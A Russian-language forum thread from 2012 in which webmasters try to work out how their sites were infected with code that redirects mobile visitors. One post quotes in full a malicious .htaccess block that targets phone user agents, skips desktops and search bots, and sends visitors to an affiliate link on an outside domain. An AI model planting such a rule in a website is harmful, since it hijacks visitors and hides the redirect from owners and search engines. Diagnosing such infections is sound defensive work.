В каком-то из сторонних модулей вредоносный код
9.85K
~XeOn~
10 июл 2012 г., 13:12
Fublin, да
Fublin
10 июл 2012 г., 13:15
~XeOn~, не тема, а бомба прям..
~XeOn~
10 июл 2012 г., 13:20
Это реальная проблема. Ведь сейчас часто такая хрень начала происходить.
Кому не влом киньте адрес на который перекидывает, попробую инфу пробить.
Кому не влом киньте адрес на который перекидывает, попробую инфу пробить.
Fublin
10 июл 2012 г., 13:30
~XeOn~, Вот сюда перекыдавает из коре у Пилота.
Но там думаю еще что то. У всех разные сайты. Я вобще сейчас склоняюсь к мысли, что это бизнес. Тоесь дешёвый трафик.. Всё пока указывает на хостеров, так как все грят что ихнии то хосты неприступны..
httр://орerauрdt.ru
Но там думаю еще что то. У всех разные сайты. Я вобще сейчас склоняюсь к мысли, что это бизнес. Тоесь дешёвый трафик.. Всё пока указывает на хостеров, так как все грят что ихнии то хосты неприступны..
httр://орerauрdt.ru
Onatolich
10 июл 2012 г., 13:32
Fublin (10.07.2012/10:30)Прикольно. С компа на тот сайт не пускает, а в Гугле нету ни одного упоминания.
~XeOn~, Вот сюда перекыдавает из коре у Пилота.
Но там думаю еще что то. У всех разные сайты. Я вобще сейчас склоняюсь к мысли, что это бизнес. Тоесь дешёвый трафик.. Всё пока указывает на хостеров,
Koenig
10 июл 2012 г., 13:32
(\/)____o_O____(\/)
пароли поменял, а так вроде дыр нет, тем более в корень хоста кинуть файл сложно, если он за пределами пхп корня находиться, либо фтп подобрали, либо хост
Libra
10 июл 2012 г., 13:51
Sensus veris
Почитала немного про эту каку. Вот только не поняла случай с core.php 
Везде пишут про то, что изменен .htaccess или в ява скрипте.
Везде пишут про то, что изменен .htaccess или в ява скрипте.
Libra
10 июл 2012 г., 13:54
Sensus veris
Onatolich (10.07.2012/10:32)Прям уж ни одного? )
Прикольно. С компа на тот сайт не пускает, а в Гугле нету ни одного упоминания.
С 4pda
Если телефон рутован, то это последствия вирусни (точнее вреданосной программы), сам "вирус" мог быть удален, но он успел модифицировать файл hosts. Советую проверить систему на вирусы (но не факт, что он что-то найдет, при этом вредонос может еще оставаться в системе), зайти в приложение superuser , изменить автоматический ответ на "спрашивать", там же, в списке программ желательно удалить все, которым уже розданы разрешения. Затем установить любую программу-банерорезку (adfree) с помощью нее восстановить оригинальный файл host и применить обновления.
Так же возможна ситуация с указанием левого dns, если вышеперечисленное не поможет. Надо покапать в ту сторону.
Все, что выше относится только к рутованному телефону, если он без рута, то проще сбросить настройки на заводские, если не жалко. Иначе придется искать вредоноса через диспетчера задач - скорее всего это одна из недавно установленных программ
сейчас пришло в голову, что я ступанул с механизмом заражения сайтов, поторопился все поздним вечером за раз сделать...
склоняюсь к заражению пхп кода файлов, возможно, что путей/механизмов заражения сайта несколько...
в общем вопрос пока открытым остается...
http://www.anti-malware.ru/for ... .html
Libra
10 июл 2012 г., 14:04
Sensus veris
Lestat (10.07.2012/11:01)Там разве что-то связанное с оперой было? Уже не понмню... Но в любом случае я тогда и htaccess смотрела, и еще несколько файлов, но все чисто было.
Libra, Лен, а вот теперь вспомни скрины что тебе кидал с твоего сайта и с сайта Флая. Там тоже был какой то код, но ты не предала тогда значения этому
Pillott
10 июл 2012 г., 14:17
Enter нажат, к чему теперь рыданья…
~XeOn~ (10.07.2012/10:20)Откопал свою старую переписку с тех.поддержкой, там где я им писал о редиректе в .htaccess который нашел. Вот смотри внизу в самом конце, это же чья-то конкретная рекламная ссылка с Id ?
Кому не влом киньте адрес на который перекидывает, попробую инфу пробить.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^.*(acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(blaz|brew|cell|cldc|cmd\-|dang|doco|eric|hipt|inno|ipaq|java).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(jigs|kddi|keji|leno|lg\-c|lg\-d|lg\-g|lge\-|maui|maxo|midp|mits|mmef|mobi).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(mot\-|moto|mwbp|nec\-|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(qwap|sage|sams|sany|sch\-|sec\-|send|seri|sgh\-|shar|sie\-|siem|smal|smar|sony).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(sph\-|symb|t\-mo|teli|tim\-|tosh|tsm\-|upg1|upsi|vk\-v|voda|w3cs|wap\-|wapa|wapi|wapp).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(wapr|webc|winw|winw|xda|xda\-|up.browser|up.link|windows.ce|iemobile|mini|mmp|symbian).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(midp|wap|phone|pocket|mobile|android|Android|pda|PPC|Series60|Opera.Mini|Moby|Mobi).* [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !iPad [NC]
RewriteCond %{HTTP_USER_AGENT} !iPhone [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ httр://oper0me.com/?a=03d4t254z4y2x4t2w4v2t2t2y3s2x434x2x264x284035403e4 [L,R=302]
Всего: 467
© 2024, JohnCMS